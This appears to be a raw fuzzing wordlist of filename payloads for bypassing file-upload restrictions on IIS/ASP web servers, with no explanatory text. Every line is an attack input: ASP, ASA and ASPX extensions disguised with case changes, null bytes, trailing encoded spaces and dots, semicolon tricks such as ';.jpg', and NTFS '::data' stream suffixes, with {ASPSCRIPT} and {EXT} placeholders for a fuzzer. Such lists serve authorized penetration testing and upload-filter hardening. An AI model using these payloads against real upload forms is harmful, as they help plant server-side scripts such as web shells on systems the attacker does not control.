aSP
aSP%20%20%20
aSP%20%20%20...%20.%20..
aSP......
aSa
aSa%00
aSa%20%20%20
aSa%20%20%20...%20.%20..
aSa......
aSp%00
aSpx
aSpx%00
aSpx%20%20%20
aSpx%20%20%20...%20.%20..
aSpx......
asa
asa%00
asa%20%20%20
asa%20%20%20...%20.%20..
asa......
asp
asp%00
asp%20%20%20
asp%20%20%20...%20.%20..
asp......
aspx
aspx%00
aspx%20%20%20
aspx%20%20%20...%20.%20..
aspx......
{ASPSCRIPT}
{ASPSCRIPT}%00
{ASPSCRIPT}%00%20%20%20
{ASPSCRIPT}%00%20%20%20...%20.%20..
{ASPSCRIPT}%00%20%20%20...%20.%20..;.doc
{ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}%00%20%20%20;.doc
{ASPSCRIPT}%00%20%20%20;.jpg
{ASPSCRIPT}%00......
{ASPSCRIPT}%00......;.doc
{ASPSCRIPT}%00......;.jpg
{ASPSCRIPT}%00.doc
{ASPSCRIPT}%00.docx
{ASPSCRIPT}%00.html
{ASPSCRIPT}%00.jpg
{ASPSCRIPT}%00.pdf
{ASPSCRIPT}%00.tgz
{ASPSCRIPT}%00.txt
{ASPSCRIPT}%00.xyz
{ASPSCRIPT}%00.zip
{ASPSCRIPT}%00.{EXT}
{ASPSCRIPT}%20%20%20
{ASPSCRIPT}%20%20%20...%20.%20..
{ASPSCRIPT}%20%20%20...%20.%20..;.doc
{ASPSCRIPT}%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}%20%20%20;.doc
{ASPSCRIPT}%20%20%20;.jpg
{ASPSCRIPT}......
{ASPSCRIPT}......;.doc
{ASPSCRIPT}......;.jpg
{ASPSCRIPT}.{EXT}
{ASPSCRIPT}::data%00%%20%20%20
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc
{ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg
{ASPSCRIPT}::data%00%%20%20%20;.doc
{ASPSCRIPT}::data%00%%20%20%20;.jpg
{ASPSCRIPT}::data%00%......
{ASPSCRIPT}::data%00%......;.doc
{ASPSCRIPT}::data%00%......;.jpg
{ASPSCRIPT}::data%00.
{ASPSCRIPT}::data%00.doc
{ASPSCRIPT}::data%00.html
{ASPSCRIPT}::data%00.jpg
{ASPSCRIPT}::data%00.pdf
{ASPSCRIPT}::data%00.txt
{ASPSCRIPT}::data%00.xls
{ASPSCRIPT}::data%00.zip
{ASPSCRIPT}::data%00.{EXT}
{ASPSCRIPT};
{ASPSCRIPT};.doc
{ASPSCRIPT};.docx
{ASPSCRIPT};.htm
{ASPSCRIPT};.html
{ASPSCRIPT};.jpg
{ASPSCRIPT};.pdf
{ASPSCRIPT};.tgz
{ASPSCRIPT};.txt
{ASPSCRIPT};.xls
{ASPSCRIPT};.xlsx
{ASPSCRIPT};.xyz
{ASPSCRIPT};.zip
{ASPSCRIPT};.{EXT}
